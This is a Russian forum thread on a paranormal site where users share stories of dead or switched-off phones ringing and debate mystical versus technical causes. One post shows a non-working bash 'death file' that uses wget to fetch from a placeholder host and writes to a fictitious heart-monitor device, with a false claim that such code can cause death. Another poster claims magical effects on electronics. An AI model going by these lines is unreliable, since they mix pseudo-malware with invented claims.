Внимание! Если при регистрации на форуме вам не приходит письмо с активацией аккаунта, напишите на почту reklama.tonkiimir@gmail.com и укажите свой ник, который зарегистрировали.

Личная страница специалиста по чисткам и защитам olya_ya

Lanitta. Страница таролога и практика любовной магии

Fiolina. Страница практика любовной и денежной магии

Ночью звонит выключенный телефон...

НЛО, загадочные существа, чудесные исцеления, воскрешения... - здесь вы можете рассказать о чудесах, свидетелями которых вы стали и обсудить это
Иногда заходит
Re: Ночью звонит выключенный телефон...

Сообщение BinBash » 22 сен 2012, 14:14

Да, как вы сказали, я сюда попал случайно, ища причину неисправности телефона (Да, за 100 рублей, купленного в переходе).
Но все таки я изменил мнение. Мне кажется, что действительно можно повлиять на технику такими вещами, как статика или радиоволны. Но иногда совпадения создают резонанс и получается нечто похожее на параноидальный бред. Но не всегда является бредом то, что им кажется.

На одном форуме тоже читал про подобные вещи, а также про такую тему, как Death-File (Файл Смерти). Это когда специальное сочетание программного кода, который может вызвать приступ истерики или даже смерть.

Например, если такой файл смерти, как :

Код: Выделить всё

#!/bin/bash
wget http://something.com/death.txt /home/system.conf
cat /home/system.conf > /dev/heart_monitor
echo Goodbye, You Life ...
cat /dev/randem > /dev/null
Может причинить серьезный вред или даже смерть пациента, подключенного к системе мониторинга сердцебиения. Конечно, последняя строчку сработает, только при наличии очень слабого процессора, и очень малого размера RAM. Конечно, этот SH-скрипт является совершенно простым и неточным, о ведь вы поняли, что дезинформация - это самый страшный враг.

Да, возможно и были случаи, когда техника выходила из-под контроля человека.

Но есть и мистика ... Об этом в следующем посте.
Изображение
Изображение
Изображение

Волшебница

Сообщение Red Mercury » 25 сен 2012, 13:21

Мне кажется, что действительно можно повлиять на технику такими вещами, как статика или радиоволны.
можно можно)
Помню был у меня один случай: сажусь я вечером как то дома смотреть интересный мне романтический фильм (т.к. телевизор я смотрю очень редко, то фильм мне действительно очень хотелось посмотреть). Идут титры и тут ко мне приезжает один из таких клиентов, которым разрешено вот так в неурочное время заваливаться. Приезжает за чистками , всю территорию большего предприятия надо было ему тогда почистить.
Про себя вздыхаю, выключаю телек, пульт кладу недалеко - на расстоянии вытянутой руки примерно, клиент напротив на диване, а я сижу рисую рунные чистки по количеству помещений и складов. Поторапливаюсь немного, но не слишком, фильм то уже небось начался. Нанесла значит чистки, зарядила и включила пультом телевизор.
Смотрю, а у клиента глаза стали сильно крупные и квадратные. Спрашиваю его что такое. Сидели вроде нормально, ничего такого...
А он и говорит, что сидел ,смотрел на мои манипуляции, как я наношу и т.д., в общем по его словам, глаз не отрывал. Так вот, пульт от телека рядом со мной лежал, но клиент божился, что рукой я к нему не тянулась. Т.е. я закончила, отложила чистки и телек просто включился.

Я ему естессно сказала, что это его проглючило, у кого по осени не случается, я то знаю, что рукой тянулась. Только вот потом сижу и думаю, тянулась или фантомно потянулась, а физич телом забыла....хто его знает :smile:
Пробовала так сделать специально , не выходит особо. Только лампочки перегорают.

btv
Иногда заходит

Сообщение btv » 14 окт 2012, 01:56

выключенный не звонил, но мне говорили, что звонила я, хотя я не звонила.

Иногда заходит

Сообщение pilott » 25 ноя 2012, 13:34

Был случай смски из будущего, но там никаких угроз, наоборот что-то дружелюбное "давно не виделись, как поживаешь?", попытка прозвониться на тот номер ни к чему ни привела, "абонент не зарегистрирован"))).
А вот более жуткое ощущение на меня навел звонок посреди ночи, на экране сотового высветился "частный вызов", беру трубу, а там детский тоненький голосочек с помехами:
-Мама? Мамочка?
Далее шипение и помехи, и я честно скажу-я испугалась и бросила трубку. Детей у меня не было, так что мне показалось странным, что какой-то ребенок будет звонить в 2 часа ночи своей "мамочке"...) Ну а поскольку вызов был "частным", то перезвонить было некуда ))) Но...мне кажется, во всех этих случаях мистику можно объяснить земной логикой))

Старожил

Сообщение Vladis » 03 дек 2012, 00:09

Интересно было бы послушать мнение технарей - возможно ли каким-нибудь образом сделать так, чтобы полученная смс была датирована не тем числом, что выставлено на телефоне получателя?

Собеседник

Сообщение Don Paul » 12 окт 2013, 23:21

Мне прошлой ночью снились могилы в воде и мой рабочий мобильник на одной из них, но я подумал в тот момент во сне что телефон просто одной модели и его вымыло из могилы.
А под утро(так думаю) было еще темно зазвонил разбудив старый телефон без сим карты! В нем даже нет режима работы без сим карты, я подумал что это режим будильника и не испугался а просто вынул аккумулятор, на дисплей я не смотрел.
Будильник я в нем тоже не включал естественно.

Старожил

Сообщение Darja_13 » 27 дек 2013, 13:24

По сути любой (почти)телефон выключите и во время будильника он позвонит,зазвенит и сообщит о том,что надо встааавааать))никакой мистики,на мой взгляд!и хорошо ведь)))!
:bye:
В разделе "ИП" использую ясновидение.

Отзывы и благодарности viewtopic.php?f=53&t=113063

Иногда заходит

Сообщение Нефертари » 09 янв 2014, 23:13

И у меня недавно зазвонил сломаный телефон. Лет 5 валялся. В нём фотки были хорошие, хотелось их как-нибудь восстановить, а потом и забыла о нём. Так он сам о себе напомнил.

Иногда заходит

Сообщение cherry11 » 03 сен 2015, 02:42

У меня вчера произошла странная ситуация,лежит у меня телефон старенький на столе включенный,но без симкарты и вдруг начал звонить,там написано неизвестно,я приняла звонок,а там молчание.Что это может быть?Р.s и это было два раза :shock:

Старожил

Сообщение Из леса » 03 сен 2015, 03:24

Стоит для начала отталкиваться от характеристик телефонов. В современные гаджеты заложены возможности, о которых рядовые пользователи даже не подозревают. Не исключены спонтанные срабатывания, при косячно сделанных микросхемах.
Или прочитайте, что такое СОРМ, и с чем его едят. Возможно, там ответы на ваши вопросы.
Лучше один раз вовремя, чем два раза правильно.

Суть же мольбища их: лес и камение и реки и блата, источники и горы и холмы, солнце и месяц и звёзды...

Humanoid

Сообщение Humanoid » 03 сен 2015, 09:24

cherry11 писал(а):У меня вчера произошла странная ситуация,лежит у меня телефон старенький на столе включенный,но без симкарты и вдруг начал звонить,там написано неизвестно,я приняла звонок,а там молчание.Что это может быть?Р.s и это было два раза :shock:
мог произойти сбой программного обеспечения, и на это может быть масса объективных причин, начиная от электромагнитных всплесков, вызываемых возможно неисправными бытовыми приборами и заканчивая магнитными бурями. Можно расписать практически каждый случай, как оно работает, но в этом не вижу смысла. Вчера у меня на столе лежали два телефона на Андроиде, и один из них стал сам по себе фотографировать потолок.... я услышал звук съёмки, потом решил посмотреть, что же это было, но ничего мистического не обнаружил.

Старожил

Сообщение Из леса » 03 сен 2015, 13:12

Humanoid, вспомните, что говорили, делали или слушали. И прочитайте то, что я написал выше. Гаджеты на Андроиде вообще словно созданы для сбора инфы о пользователях.

Суть же мольбища их: лес и камение и реки и блата, источники и горы и холмы, солнце и месяц и звёзды...

Humanoid

Сообщение Humanoid » 03 сен 2015, 13:39

Из леса
про СОРМ я давно в курсе и владею о нём гораздо большей информацией, чем это доступно в сети почитать, а когда телефон начал фоткать, то мы с женой валялись на диване и смотрели кино, ничего необычного в это время не происходило. Про андроид, гугл и всё что с этим связано - тоже в теме... Это к вопросу, типа, а ни посмотреть, каким хреном функция фотографирования управлялась? Попробую, если получится )

Добавлено спустя 9 минут 34 секунды:
Из леса писал(а): Гаджеты на Андроиде вообще словно созданы для сбора инфы о пользователях.
вот, кстати, и вопрос к ТС: а какой марки-модели был телефон?

Старожил

Сообщение Из леса » 03 сен 2015, 13:48

Humanoid, в кино произносились слова, на которые могла среагировать СОРМ!?

Встроенные камеры на ноутах и на мониторах компов бывает включаются вроде бы произвольно. У знакомых было. И тоже нет ответов, по какой причине. Лечится пластырем.
Вообще, чем сложнее система в целом, тем чаще сбои.

Humanoid

Сообщение Humanoid » 03 сен 2015, 14:27

Из леса писал(а):Humanoid, в кино произносились слова, на которые могла среагировать СОРМ!?
вполне может что и сами произносили. Иногда на какую-либо политическую новость, например, выдаю комменты, на которые теоретически может сорм среагировать, но эту систему я хорошо чувствую, скорее, был незапланированный человеком сбой, возможно и связанный с речевыми командами.

Добавлено спустя 24 минуты 21 секунду:
Из леса писал(а):
Вообще, чем сложнее система в целом, тем чаще сбои.
похоже именно на этот случай.

Иногда заходит

Сообщение Basic » 04 сен 2015, 20:44

Из леса писал(а): Гаджеты на Андроиде вообще словно созданы для сбора инфы о пользователях.
В iOS также есть скрытые процессы позволяющие иметь доступ к телефону и персональным данным без ведома пользователя.

Есть личные сообщения

Сообщение Parzifal » 04 сен 2015, 22:16

Ну телефон ночью звонит - это ещё не так страшно, а у одного человека автоматическое ружьё ночью само стало палить... :smile: Правда, тайваньсий айрсофт, дешёвка.

Старожил

Сообщение Нильс » 04 сен 2015, 22:43

С электроникой часто происходит необъяснимое, но думаю ничего сверхъестественного быть не может.

Иногда заходит

Сообщение autoport » 07 апр 2017, 19:40

Сегодня. 7 апреля на Благовещенье (не знаю важно ли это) в 00:43 в телефоне зазвонил будильник сообщая, что 6:00. Все бы ничего, но одно но: телефон не работал уже год. В январе этого года я пыталась его включить, ставила на зарядку. Но он так и не заработал. Экран не загорается и все тут. Когда зазвонил будильник сообщая о 6 утра экран работал, я зашла в настройки отключила будильник и поставила его на зарядку. Когда проснулась утром и попыталась включить телефон, то он опять ни на что не реагировал. Теперь сижу и думаю: такое бывает с техникой, которую не заряжали 3 месяца, да и будильник я вроде никогда на 6 утра не ставила или это не физика, а что-то аномальное?

Humanoid

Сообщение Humanoid » 07 апр 2017, 19:49

autoport
в процессоре телефона могут происходить как программные, так и физические сбои, особенно если имеются неисправности. На молекулярном уровне могут происходить нештатные процессы, включающиеся даже геомагнитыми возмущениями в пространстве. Никакой мистики.

Ответить